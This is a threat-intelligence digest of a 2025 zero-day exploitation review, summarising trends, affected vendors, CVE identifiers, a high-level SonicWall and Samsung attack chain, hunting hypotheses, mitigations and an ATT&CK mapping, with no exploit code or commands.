Look What You Made Us Patch: 2025 Zero-Days in Review
Google Threat Intelligence Group's 2025 review highlights 90 exploited zero-day vulnerabilities, with a significant shift toward enterprise infrastructure and edge devices. Commercial surveillance vendors outpaced state-sponsored actors in zero-day usage, while financially motivated groups and PRC-nexus espionage operators continued to heavily leverage zero-days for initial access, persistence, and data theft.
Authors: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan
Source:
Mandiant
Key Takeaways
- 90 zero-day vulnerabilities were exploited in 2025, showing a stabilization trend compared to previous years.
- Enterprise technologies accounted for 48% of zero-days, marking an all-time high and highlighting the risk to edge devices and interconnected platforms.
- Commercial surveillance vendors (CSVs) surpassed state-sponsored groups in attributed zero-day exploitation for the first time.
- Financially motivated threat groups exploited 9 zero-days, nearly matching their previous high, often leading to ransomware deployment.
- Mobile zero-days rebounded to 15, while browser-based exploitation fell to historical lows due to improved hardening.
Affected Systems
- Enterprise software and edge devices (routers, switches, security appliances)
- Desktop Operating Systems (Windows, macOS, Linux)
- Mobile Operating Systems (Android, iOS)
- Web Browsers (Chrome, Safari, Edge)
- SonicWall SMA 1000 series
- Oracle E-Business Suite (EBS)
- Samsung devices (Quram library / com.samsung.ipservice)
Vulnerabilities (CVEs)
- CVE-2025-21590
- CVE-2025-0282
- CVE-2025-61882
- CVE-2025-61884
- CVE-2025-8088
- CVE-2025-2783
- CVE-2025-48543
- CVE-2025-27038
- CVE-2024-0519
- CVE-2023-33106
- CVE-2025-6558
- CVE-2025-5419
- CVE-2025-38352
- CVE-2025-14174
- CVE-2025-23006
- CVE-2025-40602
- CVE-2025-21042
- CVE-2025-21043
- CVE-2025-43300
- CVE-2021-37973
- CVE-2023-6345
- CVE-2023-2136
Attack Chain
Threat actors leverage zero-day vulnerabilities to gain initial access, often targeting edge devices like SonicWall appliances or enterprise software like Oracle EBS. In the SonicWall chain, attackers bypass authentication, use Java deserialization for remote code execution, and exploit a local XML-RPC service for root privilege escalation. For mobile devices, attackers deliver malicious DNG images via messaging apps, which are automatically parsed by system services to achieve remote code execution and sandbox escapes.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article provides high-level behavioral descriptions and architectural mitigation strategies, but does not include specific detection rules or queries.
Detection Engineering Assessment
EDR Visibility: Medium — EDR is typically absent on edge devices (routers, switches, security appliances), creating blind spots. However, EDR on endpoints can detect post-exploitation activity like anomalous child processes or memory corruption artifacts. Network Visibility: Medium — Network monitoring can detect anomalous payloads (e.g., unencrypted Java serialized objects) or unusual traffic patterns, but encrypted exploits or local privilege escalations will be hidden. Detection Difficulty: Hard — Zero-days inherently lack signatures, and exploits targeting edge devices or utilizing 0-click mobile vectors leave minimal forensic footprints.
Required Log Sources
- Web Application Firewall (WAF) logs
- Application logs (Oracle EBS, SonicWall)
- Endpoint process execution logs
- Mobile device crash logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for anomalous child processes spawned by web application services (e.g., Java processes running shell commands) indicating potential deserialization exploitation. | Process execution logs (Event ID 4688, Sysmon Event ID 1) | Execution | Low |
| Monitor for unexpected crashes or error logs in image parsing services (e.g., com.samsung.ipservice) which may indicate failed memory corruption exploit attempts. | Mobile OS crash logs / Application logs | Initial Access | Medium |
Control Gaps
- Lack of EDR support on edge devices and security appliances
- Insufficient input validation and deserialization checks in enterprise appliances
- Lack of memory safety mitigations (PAC, BTI) in legacy C/C++ libraries on mobile devices
Key Behavioral Indicators
- Anomalous process ancestry from web services
- Unexpected Java deserialization activity
- Crashes in media parsing services
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Apply vendor patches for all listed CVEs immediately.
- Isolate vulnerable systems if patches are unavailable by disabling specific services or blocking ports.
- Reboot mobile devices regularly to disrupt in-memory payloads.
Infrastructure Hardening
- Segment DMZ, firewalls, and VPNs from critical internal assets to prevent lateral movement.
- Enforce strict driver blocklists and monitor kernel-level behavior.
- Do not expose device network ports to the internet unless strictly required.
- Maintain a Software Bill of Materials (SBoM) to quickly locate affected libraries.
User Protection
- Enable Advanced Protection Mode on Android and Lockdown Mode on iOS for high-risk users.
- Use ad blockers and configure privacy sandbox settings.
- Do not click links or download attachments from unknown contacts.
Security Awareness
- Educate high-risk users on the threats of 0-click and 1-click mobile exploits.
- Establish processes for emergency out-of-band patching.
MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1068 - Exploitation for Privilege Escalation
- T1203 - Exploitation for Client Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell